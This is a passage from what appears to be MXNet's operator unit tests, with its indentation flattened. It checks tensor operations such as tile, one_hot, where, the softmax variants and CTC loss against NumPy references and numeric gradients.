test = mx.sym.repeat(data, repeats=repeats, axis=0)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-3, rtol=1e-2)
test_repeat_forward()
test_repeat_backward(axis=0)
test_repeat_backward(axis=1)
test_repeat_numeric_gradient()
def test_reverse():
data = mx.symbol.Variable('data')
shape = (5, 5, 5)
data_tmp = np.random.uniform(-1, 1, shape)
test = mx.sym.reverse(data, axis=[1, 2])
grad = np.random.uniform(-1, 1, shape)
check_numeric_gradient(test, [data_tmp], numeric_eps=2E-2)
check_symbolic_forward(test, [data_tmp], [data_tmp[:, ::-1, ::-1]])
check_symbolic_backward(test, [data_tmp], [grad], [grad[:, ::-1, ::-1]])
def test_tile():
def test_normal_case():
ndim_min = 1
ndim_max = 5 # max number of dims of the ndarray
size_max = 10 # max number of elements in each dim
length_max = 3 # max length of reps
rep_max = 10 # max number of tiling in each dim
for ndim in range(ndim_min, ndim_max+1):
shape = []
for i in range(1, ndim+1):
shape.append(np.random.randint(1, size_max+1))
shape = tuple(shape)
a = np.random.randint(0, 100, shape)
b = mx.nd.array(a, dtype=a.dtype)
reps_len = np.random.randint(1, length_max+1)
reps_tuple = ()
for i in range(1, reps_len):
reps_tuple += (np.random.randint(1, rep_max), )
reps_array = np.asarray(reps_tuple)
a_tiled = np.tile(a, reps_array)
b_tiled = mx.nd.tile(b, reps_tuple).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_tensor():
shape = (2, 3, 0, 4)
with mx.np_shape():
a = np.array([], dtype=np.int32).reshape(shape)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
reps = (2, 4, 6)
a_tiled = np.tile(a, reps)
b_tiled = mx.nd.tile(b, reps).asnumpy()
assert same(a_tiled, b_tiled)
def test_empty_reps():
a = np.array([[2, 3, 4], [5, 6, 7]], dtype=np.int32)
b = mx.nd.array(a, ctx=default_context(), dtype=a.dtype)
a_tiled = np.tile(a, ())
b_tiled = mx.nd.tile(b, ()).asnumpy()
assert same(a_tiled, b_tiled)
def test_tile_backward():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
exe = test._bind(ctx=default_context(), args=[arr_data], args_grad=[arr_grad])
npout_grad = np.random.randint(0, 10, n1 * n2 * reps1 * reps2).reshape(n1 * reps1, n2 * reps2)
out_grad = mx.nd.array(npout_grad)
exe.backward(out_grad)
expected_grad = np.zeros(shape)
for i in range(shape[0]):
for j in range(shape[1]):
expected_grad[i][j] += sum(sum(npout_grad[i:(n1 * reps1):reps1, j:(n2 * reps2):reps2]))
assert_almost_equal(expected_grad, arr_grad, rtol=1e-3)
def test_tile_numeric_gradient():
data = mx.sym.Variable('data')
n1 = 2
n2 = 2
shape = (n1, n2)
data_tmp = np.random.randint(0, 10, n1 * n2).reshape(shape)
reps1 = 2
reps2 = 2
reps = (reps1, reps2)
test = mx.sym.tile(data, reps=reps)
check_numeric_gradient(test, [data_tmp], numeric_eps=1e-2, rtol=1e-2)
def test_invalid_reps():
data = mx.nd.arange(16).reshape((4, 4))
assert_exception(mx.nd.tile, MXNetError, data, (1, 2, -3))
assert_exception(mx.nd.tile, MXNetError, data, (1, 0, 3))
test_normal_case()
with mx.np_shape():
test_empty_tensor()
test_empty_reps()
test_tile_backward()
test_tile_numeric_gradient()
test_invalid_reps()
def test_one_hot():
def test_normal_case(index_type=np.int32):
ndim_max = 6
dim_size_max = 20
depth = int(dim_size_max / 2)
on_value = 1
off_value = 0
for ndim in range(1, ndim_max+1):
shape = ()
for i in range(1, ndim+1):
shape += (np.random.randint(1, dim_size_max+1), )
indices = np.random.randint(-dim_size_max, dim_size_max+1,
size=np.prod(shape)).reshape(shape)
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=index_type),
depth=depth, dtype=np.int32)
expected_array = np.zeros((np.prod(shape), depth), dtype=np.int32)
expected_array[:] = off_value
indices_1d = indices.flatten()
row = 0
for idx in indices_1d:
if 0 <= idx < depth:
expected_array[row, idx] = on_value
row += 1
expected_array = expected_array.reshape(shape + (depth, ))
one_hot_array = mx_one_hot_array.asnumpy()
assert same(expected_array, one_hot_array)
def test_empty_indices():
shape = (2, 0, 9, 3)
with mx.np_shape():
indices = np.array([]).reshape(shape)
depth = 10
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32
).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth,))
assert same(expected_array, mx_one_hot_array)
def test_zero_depth():
shape = (2, 4, 9, 3)
indices = np.ones(shape)
depth = 0
mx_one_hot_array = mx.nd.one_hot(
mx.nd.array(indices, ctx=default_context(), dtype=np.int32),
depth=depth, dtype=np.int32).asnumpy()
expected_array = np.array([], dtype=np.int32).reshape(shape + (depth, ))
assert same(expected_array, mx_one_hot_array)
test_normal_case(index_type=np.int32)
test_normal_case(index_type=np.float64)
test_normal_case(index_type=np.float32)
test_normal_case(index_type=np.float16)
with mx.np_shape():
test_empty_indices()
test_zero_depth()
def test_where():
def get_forward_expected_output(condition, x, y):
original_shape = x.shape
out = np.zeros(original_shape)
if condition.shape == x.shape:
for index, c in np.ndenumerate(condition):
if c != 0:
out[index] = x[index]
else:
out[index] = y[index]
elif condition.shape == (x.shape[0], ):
s = x.shape
m = s[0]
n = int(np.prod(s)/s[0])
x2d = x.reshape((m, n))
y2d = y.reshape((m, n))
out = out.reshape((m, n))
for i in range(0, m):
if condition[i] != 0:
for j in range(0, n):
out[i, j] = x2d[i, j]
else:
for j in range(0, n):
out[i, j] = y2d[i, j]
else:
raise RuntimeError("Invalid condition shape for where op")
out = out.reshape(original_shape)
return out
def get_forward_inputs_same_shape(shape):
condition_np = np.random.randint(0, 2, np.prod(shape)).reshape(shape)
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_forward_inputs_condition_vector(shape):
condition_np = np.random.randint(0, 2, shape[0])
x_np = np.random.randint(1, 6, np.prod(shape)).reshape(shape)
y_np = np.random.randint(7, 11, np.prod(shape)).reshape(shape)
return condition_np, x_np, y_np
def get_backward_input(shape):
return np.random.randint(20, 30, np.prod(shape)).reshape(shape)
def get_backward_expected_outputs(grad_in, condition):
shape = grad_in.shape
grad_cond = np.zeros(condition.shape)
grad_x = np.empty(shape)
grad_y = np.empty(shape)
for index, c in np.ndenumerate(condition):
if 0 != c:
grad_x[index] = grad_in[index]
grad_y[index] = 0
else:
grad_x[index] = 0
grad_y[index] = grad_in[index]
return grad_cond, grad_x, grad_y
def test_where_helper(shape, same_shape):
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
out_expected = get_forward_expected_output(condition_np, x_np, y_np)
grad_in_np = get_backward_input(shape)
grad_expected_cond, grad_expected_x, grad_expected_y\
= get_backward_expected_outputs(grad_in_np, condition_np)
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
grad_in_mx = mx.nd.array(grad_in_np, dtype=np.int)
where_sym = mx.sym.where(condition, x, y)
# test req='write'
where_exe_write = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='write')
# test forward req='write'
outputs = where_exe_write.forward(is_train=True, condition=condition_np,
x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='write'
where_exe_write.backward(grad_in_mx.astype('float32'))
assert same(where_exe_write.grad_dict['x'].asnumpy(), grad_expected_x)
assert same(where_exe_write.grad_dict['y'].asnumpy(), grad_expected_y)
assert same(where_exe_write.grad_dict['condition'].asnumpy(), grad_expected_cond)
# test req='add'
x_grad_init = np.random.randint(30, 40, np.prod(shape)).reshape(shape)
y_grad_init = np.random.randint(40, 50, np.prod(shape)).reshape(shape)
where_exe_add = where_sym._simple_bind(ctx=default_context(),
condition=condition_np.shape,
x=x_np.shape, y=y_np.shape,
grad_req='add')
where_exe_add.grad_dict['x'][:] = x_grad_init
where_exe_add.grad_dict['y'][:] = y_grad_init
# test forward req='add'
outputs = where_exe_add.forward(is_train=True, condition=condition_np, x=x_np, y=y_np)
assert same(outputs[0].asnumpy(), out_expected)
# test backward req='add'
where_exe_add.backward(grad_in_mx.astype('float32'))
x_ograd = where_exe_add.grad_dict['x'].asnumpy()
y_ograd = where_exe_add.grad_dict['y'].asnumpy()
assert same(x_ograd, grad_expected_x+x_grad_init)
assert same(y_ograd, grad_expected_y+y_grad_init)
def test_where_numeric_gradient(shape, same_shape):
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
if same_shape:
condition_np, x_np, y_np = get_forward_inputs_same_shape(shape)
else:
condition_np, x_np, y_np = get_forward_inputs_condition_vector(shape)
check_numeric_gradient(where_sym, [condition_np, x_np, y_np], grad_nodes=['x', 'y'])
def test_invalid_shape():
condition = mx.sym.Variable('condition')
x = mx.sym.Variable('x')
y = mx.sym.Variable('y')
where_sym = mx.sym.where(condition, x, y)
assert_exception(lambda: where_sym.eval(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
assert_exception(lambda: mx.nd.where(x=mx.nd.array([[2,3],[4,5],[6,7]]),
y=mx.nd.array([[8,9],[10,11],[12,13]]),
condition=mx.nd.array([1,0])), MXNetError)
def test_1d_cond():
cond = mx.nd.array([1, 0, 1])
x = mx.nd.array([[2, 3], [4, 5], [6, 7]])
y = mx.nd.array([[7, 8], [9, 10], [10, 11]])
expect_out = np.array([[2, 3], [9, 10], [6, 7]])
out = mx.nd.where(cond, x, y).asnumpy()
assert(expect_out.all() == out.all())
test_where_helper((5, 9), True)
test_where_helper((5, 9), False)
test_where_helper((5, 7, 9), True)
test_where_helper((5, 7, 9), False)
test_where_helper((10, 8, 15, 3), True)
test_where_helper((10, 8, 15, 3), False)
test_where_numeric_gradient((5, 9), True)
test_where_numeric_gradient((5, 9), False)
test_where_numeric_gradient((5, 7, 9), True)
test_where_numeric_gradient((5, 7, 9), False)
test_invalid_shape()
test_1d_cond()
def test_softmin():
for ndim in range(1, 5):
for dtype in [np.float16, np.float32, np.float64]:
rtol, atol = (1e-2, 5e-3) if dtype is np.float16 else (1e-3, 1e-3)
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape).astype(dtype)
data = data / 10 if dtype is np.float16 else data
sym = mx.sym.softmin(axis=axis)
expected_fwd = np_softmax(-data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], atol=atol, dtype=dtype)
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=rtol, atol=atol, grad_req=req, dtype=dtype)
if dtype is not np.float16:
check_numeric_gradient(sym, [data], rtol=rtol, atol=atol, dtype=dtype)
def test_new_softmax():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(-ndim, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.softmax(axis=axis)
expected_fwd = np_softmax(data, axis=axis)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd])
for req in ['null', 'add', 'write']:
check_symbolic_backward(sym, [data], [np.ones(expected_fwd.shape)], [expected_bwd],
rtol=1e-2, atol=1e-3, grad_req=req)
check_numeric_gradient(sym, [data], rtol=1e-2, atol=1e-3)
def test_softmax_with_temperature():
for ndim in range(1, 5):
shape = np.random.randint(1, 5, size=ndim)
data = np.random.uniform(-2, 2, size=shape)
for temp in range(1, 11):
sym = mx.sym.softmax(axis=0, temperature=temp)
expected_fwd = np_softmax(data, axis=0, temperature=temp)
expected_bwd = np.zeros(shape)
check_symbolic_forward(sym, [data], [expected_fwd], rtol=0.05, atol=1e-3)
check_symbolic_backward(sym, [data], [np.ones(shape)], [expected_bwd], rtol=0.05, atol=1e-3)
check_numeric_gradient(sym, [data], rtol=0.05, atol=1e-3)
def test_log_softmax():
for ndim in range(1, 5):
for _ in range(5):
shape = np.random.randint(1, 5, size=ndim)
axis = np.random.randint(0, ndim)
data = np.random.uniform(-2, 2, size=shape)
sym = mx.sym.log_softmax(axis=axis-ndim)
check_symbolic_forward(sym, [data], [np.log(np_softmax(data, axis=axis)+1e-20)], rtol=1e-3, atol=1e-4)
check_numeric_gradient(sym, [data], rtol=1e-1, atol=1e-2)
def test_softmax_with_large_inputs():
def softmax_forward(input_data, true_output):
data = mx.sym.Variable('data')
out1 = data.softmax(axis=1)
exec1 = out1._bind(default_context(), args={'data': input_data})
exec1.forward()[0].wait_to_read()
ndarr = exec1.outputs[0][0][0][0]
assert_almost_equal(ndarr, true_output, rtol=1e-5, atol=1e-5)
softmax_forward(mx.nd.array([[[[-1e30,-1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[1e30,1e30]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[-3.4e38,-3.4e38]]]]), np.array([1.0,1.0]))
softmax_forward(mx.nd.array([[[[3.4e38,3.4e38]]]]), np.array([1.0,1.0]))
@with_environment('MXNET_SAFE_ACCUMULATION', '1')
def test_softmax_dtype():
def check_dtypes_almost_equal(op_name,
atol, rtol,
grad_atol, grad_rtol,
idtype, ref_dtype, odtype=None):
op = getattr(mx.nd, op_name)
input_data = mx.random.uniform(shape=(100, 500))
dtype_input = input_data.astype(idtype)
ref_input = input_data.astype(ref_dtype)
dtype_input.attach_grad()
ref_input.attach_grad()
with mx.autograd.record():
dtype_softmax = op(dtype_input, axis=-1, dtype=odtype)
ref_softmax = op(ref_input, axis=-1, dtype=odtype)
assert_almost_equal(dtype_softmax, ref_softmax, rtol=rtol, atol=atol)
dtype_softmax.backward()
ref_softmax.backward()
assert_almost_equal(dtype_input.grad, ref_input.grad, rtol=grad_rtol, atol=grad_atol)
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmax', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float16', 'float32', 'float32')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64')
check_dtypes_almost_equal('softmin', 1e-5, 1e-5, 1e-5, 1e-5, 'float32', 'float64', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-2, 1e-2, 1e-2, 1e-2,
'float16', 'float32', 'float32')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64')
check_dtypes_almost_equal('log_softmax', 1e-3, 1e-3, 1e-3, 1e-3,
'float32', 'float64', 'float64')
def test_softmax_with_length():
def np_softmax_with_length(data, length):
res = np.zeros(data.shape)
for i in range(length.shape[0]):
for j in range(length.shape[1]):
leng = int(length[i, j])
res[i, 0:leng, j] = np_softmax(data[i, 0:leng, j])
return res
ndim = 3
shape = rand_shape_nd(ndim, dim=10)
len_shape = list(shape)
del len_shape[1]
len_shape = tuple(len_shape)
for dtype in [np.float16, np.float32, np.float64]:
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_length = np.random.randint(1, shape[1] + 1, len_shape)
mx_length = mx.nd.array(np_length, dtype=np.int32)
np_out = np_softmax_with_length(np_data, np_length)
data = mx.sym.Variable("data")
length = mx.sym.Variable("length")
mx_sym = mx.sym.softmax(data=data, length=length, use_length=True, axis=1)
location = {"data": mx_data, "length": mx_length}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [np.ones(shape, dtype=dtype)],
[np.zeros(shape), np.zeros(len_shape, dtype=np.int32)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3, dtype="asnumpy")
def np_softmax(x, axis=-1, temperature=1.0, normalize=True):
if normalize:
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x / temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def np_masked_softmax(data, mask, axis=-1, temperature=1.0, normalize=True):
neg = -1e18
if data.dtype == np.float16:
neg = -1e4
temp = np.where(mask, data, neg)
result = np_softmax(temp, axis=axis,
temperature=temperature,
normalize=normalize) * mask
return result
def np_masked_softmax_grad(out, grad_out, axis=-1, temperature=1.0):
temp = np.sum(out * grad_out, axis=axis, keepdims=True)
result = out * (grad_out - temp) / temperature
return result
def np_masked_log_softmax_grad(out, grad_out, mask, axis=-1, temperature=1.0):
grad_out = np.where(mask, grad_out, 0)
temp = np.sum(grad_out, axis=axis, keepdims=True)
result = (grad_out - np.exp(out) * temp) / temperature
result = np.where(mask, result, 0)
return result
@pytest.mark.parametrize('dtype', [np.float16, np.float32, np.float64])
@pytest.mark.parametrize('axis', [0, -1, -2, -3])
@pytest.mark.parametrize('ndims', [3, 4, 5])
@pytest.mark.parametrize('n_broadcast_axis', [0, 1, 2])
@pytest.mark.parametrize('temperature', [1, 5, 9 ,11])
@pytest.mark.parametrize('normalize', [True])
@pytest.mark.flaky
def test_masked_softmax(dtype, axis, ndims, n_broadcast_axis, temperature, normalize):
n_broadcast_axis = min(n_broadcast_axis, ndims - 1)
shape = rand_shape_nd(ndims, dim=10)
mx_data = rand_ndarray(shape, dtype=dtype)
bcst_dims = []
while len(bcst_dims) < n_broadcast_axis:
ax = np.random.randint(0, ndims)
if ax not in bcst_dims :
bcst_dims.append(ax)
shape_mask = list(shape)
for i in bcst_dims:
shape_mask[i] = 1
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape_mask)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np_masked_softmax(np_data, np_mask, axis,
temperature, normalize)
np_grad_out = np_masked_softmax_grad(np_out, np_grad,
axis, temperature)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_softmax(data=data, mask=mask,
temperature=temperature, axis=axis,
normalize=normalize)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out], rtol=rtol, atol=atol,
dtype="asnumpy", equal_nan=True)
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
@pytest.mark.parametrize('dtype', ['float32'])
@pytest.mark.parametrize('ndims', [1, 2, 3, 4, 5])
def test_masked_log_softmax(dtype, ndims):
shape = np.random.randint(1, 5, size=ndims)
axis = np.random.randint(0, ndims)
mx_data = rand_ndarray(shape, dtype=dtype)
np_data = mx_data.asnumpy()
np_mask = np.random.randint(0, 2, shape)
mx_mask = mx.nd.array(np_mask, dtype=np.bool)
mx_grad = rand_ndarray(shape, dtype=dtype)
np_grad = mx_grad.asnumpy()
np_out = np.log(np_masked_softmax(np_data, np_mask, axis)+1e-20) * np_mask
np_out_inf = np.where(np_mask, np_out, -np.inf)
np_grad_out = np_masked_log_softmax_grad(np_out, np_grad, np_mask, axis)
data = mx.sym.Variable("data")
mask = mx.sym.Variable("mask")
mx_sym = mx.sym.masked_log_softmax(data=data, mask=mask, axis=axis-ndims)
location = {"data": mx_data, "mask": mx_mask}
rtol = 1e-2 if dtype == np.float16 else 1e-3
atol = 1e-4 if dtype == np.float16 else 1e-5
check_symbolic_forward(mx_sym, location, [np_out_inf], rtol=rtol, atol=atol, dtype="asnumpy")
check_symbolic_backward(mx_sym, location, [mx_grad],
[np_grad_out, np.zeros(shape, dtype=np.bool)],
rtol=1e-2, atol=2e-3 if dtype == np.float16 else 1e-3,
dtype="asnumpy", equal_nan=True)
def test_pick():
def test_pick_helper(index_type=np.int32):
for mode in ['clip', 'wrap']:
ndim = np.random.randint(1, 5)
bshape = np.random.randint(1, 10, size=ndim)
axis = np.random.randint(0, ndim)
sshape = bshape.copy()
sshape[axis] = 1
data = np.random.uniform(-1, 1, size=bshape)
if mode == 'wrap':
index = np.random.randint(-2*bshape[axis], 2*bshape[axis], size=sshape)
else:
index = np.random.randint(0, bshape[axis], size=sshape)
exp = []
for i in range(ndim):
if i == axis:
if mode == 'wrap':
exp.append(index % bshape[axis])
else:
exp.append(index)
else:
ishape = [1 for _ in range(ndim)]
ishape[i] = bshape[i]
exp.append(np.arange(bshape[i]).reshape(ishape))
expected = data[exp]
data = mx.nd.array(data, dtype='float32')
index = mx.nd.array(index, dtype=index_type)
out = mx.nd.pick(data, index, axis=axis, keepdims=True, mode=mode)
assert_almost_equal(out.asnumpy(), expected)
data_holder = data
index_holder = index
data = mx.sym.Variable('data')
index = mx.sym.Variable('index')
sym = mx.sym.pick(data, index, axis=axis, keepdims=True, mode=mode)
check_numeric_gradient(sym, [data_holder, index_holder], grad_nodes=['data'])
test_pick_helper(np.int32)
test_pick_helper(np.float32)
def check_ctc_loss(acts, labels, loss_truth, contrib=False):
in_var = mx.sym.Variable('input')
labels_var = mx.sym.Variable('labels')
if contrib:
ctc = mx.sym.contrib.ctc_loss(in_var, labels_var)
else:
ctc = mx.sym.ctc_loss(in_var, labels_var)
acts_nd = mx.nd.array(acts, ctx=default_context())
labels_nd = mx.nd.array(labels, ctx=default_context())
exe = ctc._bind(ctx=default_context(), args=[acts_nd, labels_nd])
# test forward with grad calc
exe.forward(is_train=True)
outTest = exe.outputs[0].copy()
# test forward without grad calc
exe.forward(is_train=False)
outTrain = exe.outputs[0]
# make sure losses calculated with both modes are the same
assert_almost_equal(outTest, outTrain)
# test against ground truth, if available
if loss_truth is not None:
assert_almost_equal(outTest, loss_truth)
# test grad
check_numeric_gradient(ctc, [acts, labels], grad_nodes=['input'], rtol=0.05, atol=1e-3)
def test_ctc_loss():
# Test 1: check that batches are same + check against Torch WarpCTC
acts = np.array([
[[1.2, 3.4, 1.2, -0.1, -2.34], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[0.1, 0.2, 0.3, 0.22, 0.123], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14, -13, -12, -11]]],
dtype=np.float32)
labels = np.array([[2, 3, 0], [2, 3, 0]])
true_loss = np.array([4.04789, 4.04789], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts, labels, true_loss, contrib=contrib)
# Test 2:
acts2 = np.array([
[[-5, -4, -3, -2, -1], [1.2, 3.4, 1.2, -0.1, -2.34]],
[[-10, -9, -8, -7, -6], [0.1, 0.2, 0.3, 0.22, 0.123]],
[[-15, -14, -13, -12, -11], [-15, -14.2, -13.5, -12.2, -11.22]]], dtype=np.float32)
labels2 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.float32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels2, true_loss, contrib=contrib)
# Test 3: check use integer type as label
labels3 = np.array([[2, 3, 1], [2, 0, 0]], dtype=np.int32)
true_loss = np.array([7.3557, 5.4091], dtype=np.float32) # from Torch
for contrib in [False, True]:
check_ctc_loss(acts2, labels3, true_loss, contrib=contrib)
def test_ctc_loss_with_large_classes():
ctx = default_context()
num_classes = 6000
seq_len = 8
batch_size = 2
data = np.empty((num_classes, 0))
for i in range(seq_len * batch_size) :
row = np.roll(np.arange(num_classes, dtype=np.float32), i).reshape(num_classes, 1)
data = np.append(data, row/13, axis=1)
data = data.reshape(seq_len, batch_size, num_classes)
label = np.array([
[100, 200, 300, 400, 500, 0, 0, 0],
[1000, 2000, 3000, 4000, 0, 5000, 0, 0]], dtype=np.int32)
nd_data = mx.nd.array(data)
nd_label = mx.nd.array(label)
loss = mx.nd.ctc_loss(data=nd_data, label=nd_label)
expected_loss = np.array([688.02826, 145.34462])
assert_almost_equal(loss, expected_loss)
def test_ctc_loss_grad():
def check_ctc_loss_grad(blank_label, contrib=False): # from tf
vocab_size = 5
max_label_len = 5
padding_mask = -1+ (blank_label=='first')
targets_0 = [0, 1, 2, 1, 0]
loss_log_prob_0 = -3.34211
input_prob_matrix_0 = np.asarray(
[[0.633766, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, 0.588392, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, 0.321418, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, 0.643849, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[0.458235, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
gradient_log_prob_0 = np.asarray(
[[-0.366234, 0.221185, 0.0917319, 0.0129757, 0.0142857, 0.0260553],
[0.111121, -0.411608, 0.278779, 0.0055756, 0.00569609, 0.010436],
[0.0357786, 0.633813, -0.678582, 0.00249248, 0.00272882, 0.0037688],
[0.0663296, -0.356151, 0.280111, 0.00283995, 0.0035545, 0.00331533],
[-0.541765, 0.396634, 0.123377, 0.00648837, 0.00903441, 0.00623107]],
dtype=np.float32)
targets_1 = [0, 1, 1, 0]
loss_log_prob_1 = -5.42262
input_prob_matrix_1 = np.asarray(
[[0.30176, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, 0.397533, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, 0.202456],
[0.280884, 0.429522, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[0.423286, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
gradient_log_prob_1 = np.asarray(
[[-0.69824, 0.28562, 0.0831517, 0.0862751, 0.0816851, 0.161508],
[0.24082, -0.602467, 0.0557226, 0.0546814, 0.0557528, 0.19549],
[0.230246, 0.450868, 0.0389607, 0.038309, 0.0391602, -0.797544],
[0.280884, -0.570478, 0.0326593, 0.0339046, 0.0326856, 0.190345],
[-0.576714, 0.315517, 0.0338439, 0.0393744, 0.0339315, 0.154046]],
dtype=np.float32)
inputs = [
np.vstack(
[input_prob_matrix_0[t, :], input_prob_matrix_1[t, :]])
for t in range(5)
] + 2 * [np.nan * np.ones((2, vocab_size+1), np.float32)]
inputs = np.log(np.asarray(inputs, dtype=np.float32))
grad_truth = np.array([
np.vstack(
[gradient_log_prob_0[t, :], gradient_log_prob_1[t, :]])
for t in range(5)
] + 2 * [np.zeros((2, vocab_size+1), np.float32)])
if blank_label == 'first':
inputs = np.roll(inputs, 1, axis=2)
grad_truth = np.roll(grad_truth, 1, axis=2)
labels = (np.asarray([x + [padding_mask]*(max_label_len-len(x))
for x in [targets_0, targets_1]])+(blank_label == 'first'))
seq_lens = np.array([5, 5], dtype=np.int32)
label_lens = np.array([5, 4], dtype=np.int32)
loss_truth = np.array([-loss_log_prob_0, -loss_log_prob_1], np.float32)
with default_context():
data = mx.nd.array(inputs)
label = mx.nd.array(labels)
data.attach_grad()
with mx.autograd.record():
if contrib:
l = mx.contrib.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
else:
l = mx.ndarray.CTCLoss(data, label,
use_data_lengths=True,
use_label_lengths=True,
data_lengths=mx.nd.array(seq_lens),
label_lengths=mx.nd.array(label_lens),
blank_label=blank_label)
l.backward()
assert_almost_equal(l, loss_truth, atol=1e-5, rtol=1e-5)
assert_almost_equal(data.grad, grad_truth, atol=1e-5, rtol=1e-5)
for contrib in [False, True]:
for label in ['first', 'last']:
check_ctc_loss_grad(label, contrib=contrib)
def test_quantization_op():
min0 = mx.nd.array([0.0])
max0 = mx.nd.array([1.0])
a = mx.nd.array([[0.1392, 0.5928], [0.6027, 0.8579]])
qa, min1, max1 = mx.nd.contrib.quantize(a, min0, max0, out_type='int8')
a_ = mx.nd.contrib.dequantize(qa, min1, max1, out_type='float32')
qa_real = mx.nd.array([[18, 75], [77, 109]])
a_real = mx.nd.array([[0.14173228, 0.5905512], [0.6062992, 0.8582677]])
print(a_.asnumpy())
print(a_real.asnumpy())
assert same(qa.asnumpy(), qa_real.asnumpy())
assert_almost_equal(a_.asnumpy(), a_real.asnumpy(), rtol=1e-2)
def test_index_copy():
x = mx.nd.zeros((5,3))
t = mx.nd.array([[1,2,3],[4,5,6],[7,8,9]])
index = mx.nd.array([0,4,2], dtype=np.int64)
tensor = mx.nd.array([[1,2,3],[0,0,0],[7,8,9],[0,0,0],[4,5,6]])
